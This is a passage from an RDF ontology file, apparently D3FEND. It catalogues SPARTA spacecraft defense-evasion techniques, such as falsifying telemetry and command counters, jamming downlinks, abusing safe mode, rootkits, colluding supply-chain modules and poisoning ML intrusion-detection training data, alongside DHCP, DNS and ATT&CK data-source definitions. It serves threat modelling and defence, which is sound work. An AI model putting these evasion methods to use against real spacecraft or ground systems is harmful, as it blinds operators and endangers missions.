a owl:Class ; rdfs:label "Disable Fault Management - SPARTA" ; d3f:attack-id "DE-0001" ; d3f:definition "Threat actors may disable fault management within the victim spacecraft during the attack campaign. During the development process, many fault management mechanisms are added to the various parts of the spacecraft in order to protect it from a variety of bad/corrupted commands, invalid sensor data, and more. By disabling these mechanisms, threat actors may be able to have commands processed that would not normally be allowed." ; rdfs:seeAlso ; rdfs:subClassOf d3f:SPARTADefenseEvasionTechnique ; skos:prefLabel "Disable Fault Management" . d3f:DE-0002.01 a owl:Class ; rdfs:label "Inhibit Ground System Functionality - SPARTA" ; d3f:attack-id "DE-0002.01" ; d3f:definition "Threat actors may utilize access to the ground system to inhibit its ability to accurately process, render, or interpret spacecraft telemetry, effectively leaving ground controllers unaware of the spacecraft’s true state or activity. This may involve traditional denial-based techniques, such as disabling telemetry software, corrupting processing pipelines, or crashing display interfaces. In addition, more subtle deception-based techniques may be used to falsify telemetry data within the ground system — such as modifying command counters, acknowledgments, housekeeping data, or sensor outputs — to provide the appearance of nominal operation. These actions can suppress alerts, mask unauthorized activity, or prevent both automated and manual mitigations from being initiated based on misleading ground-side information. Because telemetry is the primary method by which ground controllers monitor the health, behavior, and safety of the spacecraft, any disruption or falsification of this data directly undermines situational awareness and operational control." ; rdfs:seeAlso ; rdfs:subClassOf d3f:DE-0002 ; skos:prefLabel "Inhibit Ground System Functionality" . d3f:DE-0002.02 a owl:Class ; rdfs:label "Jam Link Signal - SPARTA" ; d3f:attack-id "DE-0002.02" ; d3f:definition "Threat actors may overwhelm/jam the downlink signal to prevent transmitted telemetry signals from reaching their destination without severe modification/interference, effectively leaving ground controllers unaware of vehicle activity during this time. Telemetry is the only method in which ground controllers can monitor the health and stability of the spacecraft while in orbit. By disabling this downlink, threat actors may be able to stop mitigations from taking place." ; rdfs:seeAlso ; rdfs:subClassOf d3f:DE-0002 ; skos:prefLabel "Jam Link Signal" . d3f:DE-0002.03 a owl:Class ; rdfs:label "Inhibit Spacecraft Functionality - SPARTA" ; d3f:attack-id "DE-0002.03" ; d3f:definition "Threat actors may manipulate or shut down a target spacecraft's on-board processes to inhibit the spacecraft's ability to generate or transmit telemetry signals, effectively leaving ground controllers unaware of vehicle activity during this time. Telemetry is the only method in which ground controllers can monitor the health and stability of the spacecraft while in orbit. By disabling this downlink, threat actors may be able to stop mitigations from taking place." ; rdfs:seeAlso ; rdfs:subClassOf d3f:DE-0002 ; skos:prefLabel "Inhibit Spacecraft Functionality" . d3f:DE-0003.01 a owl:Class ; rdfs:label "Vehicle Command Counter (VCC) - SPARTA" ; d3f:attack-id "DE-0003.01" ; d3f:definition "Threat actors may attempt to hide their attempted attacks by modifying the onboard Vehicle Command Counter (VCC). This value is also sent with telemetry status to the ground controller, letting them know how many commands have been sent. By modifying this value, threat actors may prevent ground controllers from immediately discovering their activity." ; rdfs:seeAlso ; rdfs:subClassOf d3f:DE-0003 ; skos:prefLabel "Vehicle Command Counter (VCC)" . d3f:DE-0003.02 a owl:Class ; rdfs:label "Rejected Command Counter - SPARTA" ; d3f:attack-id "DE-0003.02" ; d3f:definition "Threat actors may attempt to hide their attempted attacks by modifying the onboard Rejected Command Counter. Similarly to the VCC, the Rejected Command Counter keeps track of how many commands that were rejected by the spacecraft for some reason. Threat actors may target this counter in particular to ensure their various attempts are not discovered." ; rdfs:seeAlso ; rdfs:subClassOf d3f:DE-0003 ; skos:prefLabel "Rejected Command Counter" . d3f:DE-0003.03 a owl:Class ; rdfs:label "Command Receiver On/Off Mode - SPARTA" ; d3f:attack-id "DE-0003.03" ; d3f:definition "Threat actors may modify the command receiver mode, in particular turning it on or off. When the command receiver mode is turned off, the spacecraft can no longer receive commands in some capacity. Threat actors may use this time to ensure that ground controllers cannot prevent their code or commands from executing on the spacecraft." ; rdfs:seeAlso ; rdfs:subClassOf d3f:DE-0003 ; skos:prefLabel "Command Receiver On/Off Mode" . d3f:DE-0003.04 a owl:Class ; rdfs:label "Command Receivers Received Signal Strength - SPARTA" ; d3f:attack-id "DE-0003.04" ; d3f:definition "Threat actors may target the on-board command receivers received signal parameters (i.e., automatic gain control (AGC)) in order to stop specific commands or signals from being processed by the spacecraft. For ground controllers to communicate with spacecraft in orbit, the on-board receivers need to be configured to receive signals with a specific signal to noise ratio (ratio of signal power to the noise power). Targeting values related to the antenna signaling that are modifiable can prevent the spacecraft from receiving ground commands." ; rdfs:seeAlso ; rdfs:subClassOf d3f:DE-0003 ; skos:prefLabel "Command Receivers Received Signal Strength" . d3f:DE-0003.05 a owl:Class ; rdfs:label "Command Receiver Lock Modes - SPARTA" ; d3f:attack-id "DE-0003.05" ; d3f:definition "When the received signal strength reaches the established threshold for reliable communications, command receiver lock is achieved. Command lock indicates that the spacecraft is capable of receiving a command but doesn't require a command to be processed. Threat actors can attempt command lock to test their ability for future commanding and if they pre-positioned malware on the spacecraft it can target the modification of command lock value to avoid being detected that command lock has been achieved." ; rdfs:seeAlso ; rdfs:subClassOf d3f:DE-0003 ; skos:prefLabel "Command Receiver Lock Modes" . d3f:DE-0003.06 a owl:Class ; rdfs:label "Telemetry Downlink Modes - SPARTA" ; d3f:attack-id "DE-0003.06" ; d3f:definition "Threat actors may target the various downlink modes configured within the victim spacecraft. This value triggers the various modes that determine how telemetry is sent to the ground station, whether it be in real-time, playback, or others. By modifying the various modes, threat actors may be able to hide their campaigns for a period of time, allowing them to perform further, more sophisticated attacks." ; rdfs:seeAlso ; rdfs:subClassOf d3f:DE-0003 ; skos:prefLabel "Telemetry Downlink Modes" . d3f:DE-0003.07 a owl:Class ; rdfs:label "Cryptographic Modes - SPARTA" ; d3f:attack-id "DE-0003.07" ; d3f:definition "Threat actors may modify the internal cryptographic modes of the victim spacecraft. Most spacecraft, when cryptography is enabled, as the ability to change keys, algorithms, or turn the cryptographic module completely off. Threat actors may be able to target this value in order to hide their traffic. If the spacecraft in orbit cryptographic mode differs from the mode on the ground, communication can be stalled." ; rdfs:seeAlso ; rdfs:subClassOf d3f:DE-0003 ; skos:prefLabel "Cryptographic Modes" . d3f:DE-0003.08 a owl:Class ; rdfs:label "Received Commands - SPARTA" ; d3f:attack-id "DE-0003.08" ; d3f:definition "Satellites often record which commands were received and executed. These records can be routinely reflected in the telemetry or through ground operators specifically requesting them from the satellite. If an adversary has conducted a cyber attack against a satellite’s command system, this is an obvious source of identifying the attack and assessing the impact. If this data is not automatically generated and transmitted to the ground for analysis, the ground operators should routinely order and examine this data. For instance, commands or data uplinks that change stored command procedures will not necessarily create an observable in nominal telemetry, but may be ordered, examined, and identified in the command log of the system. Threat actors may manipulate these stored logs to avoid detection." ; rdfs:seeAlso ; rdfs:subClassOf d3f:DE-0003 ; skos:prefLabel "Received Commands" . d3f:DE-0003.09 a owl:Class ; rdfs:label "System Clock for Evasion - SPARTA" ; d3f:attack-id "DE-0003.09" ; d3f:definition "Telemetry frames are a snapshot of satellite data at a particular time. Timing information is included for when the data was recorded, near the header of the frame packets. There are several ways satellites calculate the current time, including through use of GPS. An adversary conducting a cyber attack may be interested in altering the system clock for a variety of reasons, including misrepresentation of when certain actions took place." ; rdfs:seeAlso ; rdfs:subClassOf d3f:DE-0003 ; skos:prefLabel "System Clock for Evasion" . d3f:DE-0003.10 a owl:Class ; rdfs:label "GPS Ephemeris - SPARTA" ; d3f:attack-id "DE-0003.10" ; d3f:definition "A satellite with a GPS receiver can use ephemeris data from GPS satellites to estimate its own position in space. A hostile actor could spoof the GPS signals to cause erroneous calculations of the satellite’s position. The received ephemeris data is often telemetered and can be monitored for indications of GPS spoofing. Reception of ephemeris data that changes suddenly without a reasonable explanation (such as a known GPS satellite handoff), could provide an indication of GPS spoofing and warrant further analysis. Threat actors could also change the course of the vehicle and falsify the telemetered data to temporarily convince ground operators the vehicle is still on a proper course." ; rdfs:seeAlso ; rdfs:subClassOf d3f:DE-0003 ; skos:prefLabel "GPS Ephemeris" . d3f:DE-0003.11 a owl:Class ; rdfs:label "Watchdog Timer (WDT) for Evasion - SPARTA" ; d3f:attack-id "DE-0003.11" ; d3f:definition "Threat actors may manipulate the WDT for several reasons including the manipulation of timeout values which could enable processes to run without interference - potentially depleting on-board resources." ; rdfs:seeAlso ; rdfs:subClassOf d3f:DE-0003 ; skos:prefLabel "Watchdog Timer (WDT) for Evasion" . d3f:DE-0003.12 a owl:Class ; rdfs:label "Poison AI/ML Training for Evasion - SPARTA" ; d3f:attack-id "DE-0003.12" ; d3f:definition "Threat actors may perform data poisoning attacks against the training data sets that are being used for security features driven by artificial intelligence (AI) and/or machine learning (ML). In the context of defense evasion, when the security features are informed by AI/ML an attacker may perform data poisoning to achieve evasion. The poisoning intentionally implants incorrect correlations in the model by modifying the training data thereby preventing the AI/ML from effectively detecting the attacks by the threat actor. For instance, if a threat actor has access to the dataset used to train a machine learning model for intrusion detection/prevention, they might want to inject tainted data to ensure their TTPs go undetected. With the datasets typically used for AI/ML (i.e., thousands and millions of data points), it would not be hard for a threat actor to inject poisoned examples without being noticed. When the AI model is trained with the tainted data, it will fail to detect the threat actor's TTPs thereby achieving the evasion goal." ; rdfs:seeAlso ; rdfs:subClassOf d3f:DE-0003 ; skos:prefLabel "Poison AI/ML Training for Evasion" . d3f:DE-0004 a owl:Class ; rdfs:label "Masquerading - SPARTA" ; d3f:attack-id "DE-0004" ; d3f:definition "Threat actors may gain access to a victim spacecraft by masquerading as an authorized entity. This can be done several ways, including through the manipulation of command headers, spoofing locations, or even leveraging Insider's access (i.e., Insider Threat)" ; rdfs:seeAlso ; rdfs:subClassOf d3f:SPARTADefenseEvasionTechnique ; skos:prefLabel "Masquerading" . d3f:DE-0005 a owl:Class ; rdfs:label "Subvert Protections via Safe-Mode - SPARTA" ; d3f:attack-id "DE-0005" ; d3f:definition "Threat actors may exploit safe mode to evade security controls and avoid detection by issuing commands or performing actions that would be blocked during nominal operations. In safe mode, spacecraft often disable telemetry filtering, authentication checks, or command restrictions to prioritize recovery, which can be subverted by an attacker to conceal malicious activity or establish a persistent foothold." ; rdfs:seeAlso ; rdfs:subClassOf d3f:SPARTADefenseEvasionTechnique ; skos:prefLabel "Subvert Protections via Safe-Mode" . d3f:DE-0006 a owl:Class ; rdfs:label "Modify Whitelist - SPARTA" ; d3f:attack-id "DE-0006" ; d3f:definition "Threat actors may target whitelists on the spacecrafts as a means to execute and/or hide malicious processes/programs. Whitelisting is a common technique used on traditional IT systems but has also been used on spacecrafts. Whitelisting is used to prevent execution of unknown or potentially malicious software. However, this technique can be bypassed if not implemented correctly but threat actors may also simply attempt to modify the whitelist outright to ensure their malicious software will operate on the spacecraft that utilizes whitelisting." ; rdfs:seeAlso ; rdfs:subClassOf d3f:SPARTADefenseEvasionTechnique ; skos:prefLabel "Modify Whitelist" . d3f:DE-0007 a owl:Class ; rdfs:label "Evasion via Rootkit - SPARTA" ; d3f:attack-id "DE-0007" ; d3f:definition "Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information. Rootkits or rootkit enabling functionality may reside at the flight software or kernel level in the operating system or lower, to include a hypervisor, Master Boot Record, or System Firmware." ; rdfs:seeAlso ; rdfs:subClassOf d3f:SPARTADefenseEvasionTechnique ; skos:prefLabel "Evasion via Rootkit" . d3f:DE-0008 a owl:Class ; rdfs:label "Evasion via Bootkit - SPARTA" ; d3f:attack-id "DE-0008" ; d3f:definition "Adversaries may use bootkits to persist on systems and evade detection. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly." ; rdfs:seeAlso ; rdfs:subClassOf d3f:SPARTADefenseEvasionTechnique ; skos:prefLabel "Evasion via Bootkit" . d3f:DE-0009.01 a owl:Class ; rdfs:label "Debris Field - SPARTA" ; d3f:attack-id "DE-0009.01" ; d3f:definition "Threat actors may hide their spacecraft by lying dormant within clusters of space junk or similar debris fields. This could serve several purposes including concealment of inspection activities being performed by the craft, as well as facilitating some future kinetic intercept/attack. Threat actors may also utilize the timing of a target spacecraft passing through a debris field to execute an onboard attack with cyber-physical implications, such as manipulating propulsion or actuators in some way, with the hope that ground operators may mistakenly attribute any resulting damage to debris collisions." ; rdfs:seeAlso ; rdfs:subClassOf d3f:DE-0009 ; skos:prefLabel "Debris Field" . d3f:DE-0009.02 a owl:Class ; rdfs:label "Space Weather - SPARTA" ; d3f:attack-id "DE-0009.02" ; d3f:definition "Space weather and its associated hazards imposed on spacecraft are a well-studied field of their own. However, it is also important to note the potential for threat actors to take advantage of heightened periods of solar activity to conduct electromagnetic interference (EMI) operations as they may be falsely attributed to natural events." ; rdfs:seeAlso ; rdfs:subClassOf d3f:DE-0009 ; skos:prefLabel "Space Weather" . d3f:DE-0009.03 a owl:Class ; rdfs:label "Trigger Premature Intercept - SPARTA" ; d3f:attack-id "DE-0009.03" ; d3f:definition "Threat actors may utilize decoy technology to disrupt detection and interception systems and deplete resources that might otherwise prevent an actual attack taking place simultaneously or shortly after the decoy is deployed." ; rdfs:seeAlso ; rdfs:subClassOf d3f:DE-0009 ; skos:prefLabel "Trigger Premature Intercept" . d3f:DE-0009.04 a owl:Class ; rdfs:label "Targeted Deception of Onboard SSA/SDA Sensors - SPARTA" ; d3f:attack-id "DE-0009.04" ; d3f:definition "Threat actors may intentionally degrade or manipulate the spacecraft’s onboard sensors or associated systems used for Space Domain Awareness (SDA). This allows an adversary to hide proximity operations, mislead threat detection logic, or disrupt autonomous responses by confusing local SDA feeds. Unlike debris field concealment, this technique targets the spacecraft's own perception systems through directed interference, spoofing, or environmental manipulation. There is a distinction with DE-0009.01 where threat actors could use debris or environment to hide themselves. Where with this sub-technique, the threat actor attacks your sensors so you can’t see them." ; rdfs:seeAlso ; rdfs:subClassOf d3f:DE-0009 ; skos:prefLabel "Targeted Deception of Onboard SSA/SDA Sensors" . d3f:DE-0009.05 a owl:Class ; rdfs:label "Corruption or Overload of Ground-Based SDA Systems - SPARTA" ; d3f:attack-id "DE-0009.05" ; d3f:definition "Threat actors may target the ground-based systems and data pipelines that support Space Domain Awareness (SDA), either by corrupting key data sources, manipulating tracking information, or overloading the ingestion architecture. The objective is to blind or confuse decision-makers and automated systems responsible for monitoring and responding to on-orbit activity. This includes compromising or spoofing telemetry, TLEs, sensor feeds, radar/optical returns, or orbital prediction services used by tracking centers. It also includes the enumeration and exploitation of analytic infrastructures, such as AI/ML-enhanced SDA platforms. In cases where SDA systems leverage AI/ML inference for object detection and decision support, attackers may seek to degrade model performance by flooding the data pipeline with misleading, noisy, adversarial, or low-quality sensor inputs. These disruptions aim to delay detection of threats, generate false positives, or cause resource exhaustion in SDA fusion and alerting systems. This sub-technique differs from onboard deception (e.g., sensor spoofing) by targeting the terrestrial decision support infrastructure, potentially affecting multiple spacecraft or operators simultaneously." ; rdfs:seeAlso ; rdfs:subClassOf d3f:DE-0009 ; skos:prefLabel "Corruption or Overload of Ground-Based SDA Systems" . d3f:DE-0010 a owl:Class ; rdfs:label "Overflow Audit Log - SPARTA" ; d3f:attack-id "DE-0010" ; d3f:definition "Threat actors may seek to exploit the inherent nature of flight software and its limited capacity for event logging/storage between downlink windows as a means to conceal malicious activity." ; rdfs:seeAlso ; rdfs:subClassOf d3f:SPARTADefenseEvasionTechnique ; skos:prefLabel "Overflow Audit Log" . d3f:DE-0011 a owl:Class ; rdfs:label "Credentialed Evasion - SPARTA" ; d3f:attack-id "DE-0011" ; d3f:definition "Threat actors may leverage valid credentials to conduct unauthorized actions against a spacecraft or related system in a way that conceals their presence and evades detection. By using trusted authentication mechanisms attackers can blend in with legitimate operations and avoid triggering access control alarms or anomaly detection systems. This technique enables evasion by appearing authorized, allowing adversaries to issue commands, access sensitive subsystems, or move laterally within spacecraft or constellation architectures without exploiting software vulnerabilities. When credential use is poorly segmented or monitored, this form of access can be used to maintain stealthy persistence or facilitate other tactics under the guise of legitimate activity." ; rdfs:seeAlso ; rdfs:subClassOf d3f:SPARTADefenseEvasionTechnique ; skos:prefLabel "Credentialed Evasion" . d3f:DE-0012 a owl:Class ; rdfs:label "Component Collusion - SPARTA" ; d3f:attack-id "DE-0012" ; d3f:definition """This technique involves two or more compromised components operating in coordination to conceal malicious activity. Threat actors compromise multiple software modules during the supply chain process and design them to behave cooperatively. Each component independently performs only a limited, seemingly benign function, such that when analyzed in isolation, no single module appears malicious. An example of implementation involves one component acting as a trigger agent, waiting for specific mission or system conditions (e.g., GPS fix, telemetry state) and writing a signal to a shared resource (e.g., file, bus). A separate action agent monitors this resource and only executes the malicious behavior (such as data exfiltration or command injection) upon receiving the trigger. This division of responsibilities significantly undermines traditional detection techniques, such as log analysis, static code review, or heuristic-based behavior monitoring.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:SPARTADefenseEvasionTechnique ; skos:prefLabel "Component Collusion" . d3f:DHCPInformEvent a owl:Class ; rdfs:label "DHCP Inform Event" ; d3f:definition "An event where a DHCP client sends an INFORM message to request configuration parameters, such as DNS or gateway information, without requiring IP address assignment." ; rdfs:subClassOf d3f:DHCPEvent ; skos:altLabel "DHCPINFORM" . d3f:DHCPLeaseExpireEvent a owl:Class ; rdfs:label "DHCP Lease Expire Event" ; d3f:definition "An event indicating that a DHCP lease has expired, rendering the previously assigned IP address available for reassignment to other devices." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:preceded-by ; owl:someValuesFrom d3f:DHCPAckEvent ], d3f:DHCPEvent ; skos:altLabel "DHCPLEASEEXPIRE" . d3f:DHCPNakEvent a owl:Class ; rdfs:label "DHCP Nak Event" ; d3f:definition "An event where a DHCP server sends a NAK message to reject a client's REQUEST, indicating that the requested configuration cannot be granted." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:preceded-by ; owl:someValuesFrom d3f:DHCPRequestEvent ], d3f:DHCPEvent ; skos:altLabel "DHCPNAK" . d3f:DHCPReleaseEvent a owl:Class ; rdfs:label "DHCP Release Event" ; d3f:definition "An event where a DHCP client sends a RELEASE message to relinquish its assigned IP address and cancel any remaining lease duration." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:preceded-by ; owl:someValuesFrom d3f:DHCPAckEvent ], d3f:DHCPEvent ; skos:altLabel "DHCPRELEASE" . d3f:DHCPServer a owl:Class, owl:NamedIndividual ; rdfs:label "DHCP Server" ; d3f:contains d3f:DHCPServiceApplication ; d3f:definition "A Dynamic Host Configuration Protocol (DHCP) server is a type of server that assigns IP addresses to computers. DHCP servers are used to assign IP addresses to computers and other devices automatically. The DHCP server is responsible for assigning the unique IP address to each device." ; d3f:manages d3f:DHCPService ; rdfs:isDefinedBy ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:manages ; owl:someValuesFrom d3f:DHCPService ], [ a owl:Restriction ; owl:onProperty d3f:contains ; owl:someValuesFrom d3f:DHCPServiceApplication ], d3f:Server . d3f:DNN-basedClustering a owl:Class, owl:NamedIndividual ; rdfs:label "DNN-based Clustering" ; d3f:d3fend-id "D3A-DBC" ; d3f:definition "DNNs serve for clustering as mappings to better representations. The features of these representations can be drawn from different layers of the network or even from several layers." ; d3f:kb-article """## References OpenReview. (n.d.). Unsupervised Clustering using Pseudo Ensemble Models. [Link](https://openreview.net/pdf?id=B1eT9VMgOX)""" ; rdfs:subClassOf d3f:ANN-basedClustering . d3f:DNSResponseEvent a owl:Class ; rdfs:label "DNS Response Event" ; d3f:definition "An event where a DNS server responds to a query with resolution data." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:preceded-by ; owl:someValuesFrom d3f:DNSQueryEvent ], d3f:DNSEvent . d3f:DNSServer a owl:Class ; rdfs:label "DNS Server" ; d3f:definition """A Domain Name System (DNS) name server is a kind of name server. Domain names are one of the two principal namespaces of the Internet. The most important function of DNS servers is the translation (resolution) of human-memorable domain names and hostnames into the corresponding numeric Internet Protocol (IP) addresses, the second principal name space of the Internet which is used to identify and locate computer systems and resources on the Internet. (en). More generally, a name server is a computer application that implements a network service for providing responses to queries against a directory service. It translates an often humanly meaningful, text-based identifier to a system-internal, often numeric identification or addressing component. This service is performed by the server in response to a service protocol request.""" ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:Server . d3f:DS0001 a d3f:ATTACKEnterpriseDataSource, owl:NamedIndividual ; rdfs:label "Firmware (ATT&CK DS)" ; d3f:definition "Computer software that provides low-level control for the hardware and device(s) of a host, such as BIOS or UEFI/EFI" ; rdfs:comment "This data source captures events relating to firmware and therefore has no direct mappings to digital artifacts." . d3f:DS0002 a d3f:ATTACKEnterpriseDataSource, owl:NamedIndividual ; rdfs:label "User Account (ATT&CK DS)" ; d3f:definition "A profile representing a user, device, service, or application used to authenticate and access resources" ; d3f:exactly d3f:UserAccount ; rdfs:comment "The digital artifact mapping for this data source is only applicable to the User Account Metadata component" . d3f:DS0003 a d3f:ATTACKEnterpriseDataSource, owl:NamedIndividual ; rdfs:label "Scheduled Job (ATT&CK DS)" ; d3f:definition "Automated tasks that can be executed at a specific time or on a recurring schedule running in the background (ex: Cron daemon, task scheduler, BITS)" ; d3f:exactly d3f:ScheduledJob ; rdfs:comment "The digital artifact mapping for this data source is only applicable to the Scheduled Job Metadata component" . d3f:DS0004 a d3f:ATTACKEnterpriseDataSource, owl:NamedIndividual ; rdfs:label "Malware Repository (ATT&CK DS)" ; d3f:definition "Information obtained (via shared or submitted samples) regarding malicious software (droppers, backdoors, etc.) used by adversaries" ; d3f:narrower d3f:FileHash, d3f:ImageCodeSegment ; rdfs:comment "The digital artifact mapping for this data source is only applicable to the Scheduled Job Metadata component" . d3f:DS0005 a d3f:ATTACKEnterpriseDataSource, owl:NamedIndividual ; rdfs:label "WMI (ATT&CK DS)" ; d3f:definition "The infrastructure for management data and operations that enables local and remote management of Windows personal computers and servers" ; rdfs:comment "This data source captures events relating to WMI objects and therefore has no direct mappings to digital artifacts." . d3f:DS0006 a d3f:ATTACKEnterpriseDataSource, owl:NamedIndividual ; rdfs:label "Web Credential (ATT&CK DS)" ; d3f:definition "Credential material, such as session cookies or tokens, used to authenticate to web applications and services" ; rdfs:comment "This data source captures events relating to web credentials and therefore has no direct mappings to digital artifacts." . d3f:DS0007 a d3f:ATTACKEnterpriseDataSource, owl:NamedIndividual ; rdfs:label "Image (ATT&CK DS)" ; d3f:definition "A single file used to deploy a virtual machine/bootable disk into an on-premise or third-party cloud environment" ; d3f:exactly d3f:VMImage ; rdfs:comment "The digital artifact mapping for this data source is only applicable to the Image Metadata component" . d3f:DS0008 a d3f:ATTACKEnterpriseDataSource, owl:NamedIndividual ; rdfs:label "Kernel (ATT&CK DS)" ; d3f:definition "A computer program, at the core of a computer OS, that resides in memory and facilitates interactions between hardware and software components" ; rdfs:comment "This data source captures events relating to kernel modules and therefore has no direct mappings to digital artifacts." . d3f:DS0009 a d3f:ATTACKEnterpriseDataSource, owl:NamedIndividual ; rdfs:label "Process (ATT&CK DS)" ; d3f:definition "Instances of computer programs that are being executed by at least one thread. Processes have memory space for process executables, loaded modules (DLLs or shared libraries), and allocated memory regions containing everything from user input to application-specific data structures" ; d3f:exactly d3f:Process ; rdfs:comment "The digital artifact mapping for this data source is only applicable to the Process Metadata component" . d3f:DS0010 a d3f:ATTACKEnterpriseDataSource, owl:NamedIndividual ; rdfs:label "Cloud Storage (ATT&CK DS)" ; d3f:definition "Data object storage infrastructure hosted on-premise or by third-party providers, made available to users through network connections and/or APIs" ; d3f:exactly d3f:CloudStorage ; rdfs:comment "The digital artifact mapping for this data source is only applicable to the Cloud Storage Metadata component" . d3f:DS0011 a d3f:ATTACKEnterpriseDataSource, owl:NamedIndividual ; rdfs:label "Module (ATT&CK DS)" ; d3f:definition "Executable files consisting of one or more shared classes and interfaces, such as portable executable (PE) format binaries/dynamic link libraries (DLL), executable and linkable format (ELF) binaries/shared libraries, and Mach-O format binaries/shared libraries" ; rdfs:comment "This data source captures events relating to software libraries and therefore has no direct mappings to digital artifacts." . d3f:DS0012 a d3f:ATTACKEnterpriseDataSource, owl:NamedIndividual ; rdfs:label "Script (ATT&CK DS)" ; d3f:definition "A file or stream containing a list of commands, allowing them to be launched in sequence" ; rdfs:comment "This data source captures events relating to scripts and therefore has no direct mappings to digital artifacts." . d3f:DS0013 a d3f:ATTACKEnterpriseDataSource, owl:NamedIndividual ; rdfs:label "Sensor Health (ATT&CK DS)" ; d3f:definition "Information from host telemetry providing insights about system status, errors, or other notable functional activity" ; rdfs:comment "This data source currently has no mappings to digital artifacts." . d3f:DS0014 a d3f:ATTACKEnterpriseDataSource, owl:NamedIndividual ; rdfs:label "Pod (ATT&CK DS)" ; d3f:definition "A single unit of shared resources within a cluster, comprised of one or more containers" ; rdfs:comment "This data source captures events relating to pods and therefore has no direct mappings to digital artifacts." . d3f:DS0015 a d3f:ATTACKEnterpriseDataSource, owl:NamedIndividual ; rdfs:label "Application Log (ATT&CK DS)" ; d3f:broader d3f:Log ; d3f:definition "Events collected by third-party services such as mail servers, web applications, or other appliances (not by the native OS or platform)" . d3f:DS0016 a d3f:ATTACKEnterpriseDataSource, owl:NamedIndividual ; rdfs:label "Drive (ATT&CK DS)" ; d3f:definition "A non-volatile data storage device (hard drive, floppy disk, USB flash drive) with at least one formatted partition, typically mounted to the file system and/or assigned a drive letter" ; rdfs:comment "This data source captures events relating to drives and therefore has no direct mappings to digital artifacts." . d3f:DS0017 a d3f:ATTACKEnterpriseDataSource, owl:NamedIndividual ; rdfs:label "Command (ATT&CK DS)" ; d3f:definition "A directive given to a computer program, acting as an interpreter of some kind, in order to perform a specific task" ; rdfs:comment "This data source captures events relating to commands and therefore has no direct mappings to digital artifacts." . d3f:DS0018 a d3f:ATTACKEnterpriseDataSource, owl:NamedIndividual ; rdfs:label "Firewall (ATT&CK DS)" ; d3f:definition "A network security system, running locally on an endpoint or remotely as a service (ex: cloud environment), that monitors and controls incoming/outgoing network traffic based on predefined rules" ; d3f:exactly d3f:Firewall ; rdfs:comment "The digital artifact mapping for this data source is only applicable to the Firewall Metadata component" . d3f:DS0019 a d3f:ATTACKEnterpriseDataSource, owl:NamedIndividual ; rdfs:label "Service (ATT&CK DS)" ; d3f:definition "A computer process that is configured to execute continuously in the background and perform system tasks, in some cases before any user has logged in" ; d3f:exactly d3f:ServiceApplicationProcess ; rdfs:comment "The digital artifact mapping for this data source is only applicable to the Service Metadata component" . d3f:DS0020 a d3f:ATTACKEnterpriseDataSource, owl:NamedIndividual ; rdfs:label "Snapshot (ATT&CK DS)" ; d3f:definition "A point-in-time copy of cloud volumes (files, settings, etc.) that can be created and/or deployed in cloud environments" ; d3f:exactly d3f:VolumeSnapshot ; rdfs:comment "The digital artifact mapping for this data source is only applicable to the Volume Metadata component" . d3f:DS0021 a d3f:ATTACKEnterpriseDataSource, owl:NamedIndividual ; rdfs:label "Persona (ATT&CK DS)" ; d3f:definition "A malicious online profile representing a user commonly used by adversaries to social engineer or otherwise target victims" ; rdfs:comment "This data source currently has no mappings to digital artifacts." . d3f:DS0022 a d3f:ATTACKEnterpriseDataSource, owl:NamedIndividual ; rdfs:label "File (ATT&CK DS)" ; d3f:definition "A computer resource object, managed by the I/O system, for storing data (such as images, text, videos, computer programs, or any wide variety of other media)" ; d3f:narrower d3f:FileSystemMetadata ; rdfs:comment "The digital artifact mapping for this data source is only applicable to the File Metadata component" . d3f:DS0023 a d3f:ATTACKEnterpriseDataSource, owl:NamedIndividual ; rdfs:label "Named Pipe (ATT&CK DS)" ; d3f:definition "Mechanisms that allow inter-process communication locally or over the network. A named pipe is usually found as a file and processes attach to it" ; d3f:exactly d3f:NamedPipe . d3f:DS0024 a d3f:ATTACKEnterpriseDataSource, owl:NamedIndividual ; rdfs:label "Windows Registry (ATT&CK DS)" ; d3f:definition "A Windows OS hierarchical database that stores much of the information and settings for software programs, hardware devices, user preferences, and operating-system configurations" ; rdfs:comment "This data source captures events relating to Windows registry keys and values and therefore has no direct mappings to digital artifacts." . d3f:DS0025 a d3f:ATTACKEnterpriseDataSource, owl:NamedIndividual ; rdfs:label "Cloud Service (ATT&CK DS)" ; d3f:definition "Infrastructure, platforms, or software that are hosted on-premise or by third-party providers, made available to users through network connections and/or APIs" ; rdfs:comment "This data source currently has no mappings to digital artifacts." . d3f:DS0026 a d3f:ATTACKEnterpriseDataSource, owl:NamedIndividual ; rdfs:label "Active Directory (ATT&CK DS)" ; d3f:definition "A database and set of services that allows administrators to manage permissions, access to network resources, and stored data objects (user, group, application, or devices)" ; rdfs:comment "This data source captures events relating to Active Directory objects and therefore has no direct mappings to digital artifacts." . d3f:DS0027 a d3f:ATTACKEnterpriseDataSource, owl:NamedIndividual ; rdfs:label "Driver (ATT&CK DS)" ; d3f:definition "A computer program that operates or controls a particular type of device that is attached to a computer. Provides a software interface to hardware devices, enabling operating systems and other computer programs to access hardware functions without needing to know precise details about the hardware being used" ; rdfs:comment "This data source captures events relating to hardware drivers and therefore has no direct mappings to digital artifacts." . d3f:DS0028 a d3f:ATTACKEnterpriseDataSource, owl:NamedIndividual ; rdfs:label "Logon Session (ATT&CK DS)" ; d3f:broader d3f:LoginSession ; d3f:definition "Logon occurring on a system or resource (local, domain, or cloud) to which a user/device is gaining access after successful authentication and authorization" ; rdfs:comment "The digital artifact mapping for this data source is only applicable to the Login Session Metadata component" . d3f:DS0029 a d3f:ATTACKEnterpriseDataSource, owl:NamedIndividual ; rdfs:label "Network Traffic (ATT&CK DS)" ; d3f:definition "Data transmitted across a network (ex: Web, DNS, Mail, File, etc.), that is either summarized (ex: Netflow) and/or captured as raw data in an analyzable format (ex: PCAP)" ; d3f:exactly d3f:NetworkTraffic ; rdfs:comment "The digital artifact mapping for this data source is only applicable to the Network Traffic Content component" . d3f:DS0030 a d3f:ATTACKEnterpriseDataSource, owl:NamedIndividual ; rdfs:label "Instance (ATT&CK DS)" ; d3f:definition "A virtual server environment which runs workloads, 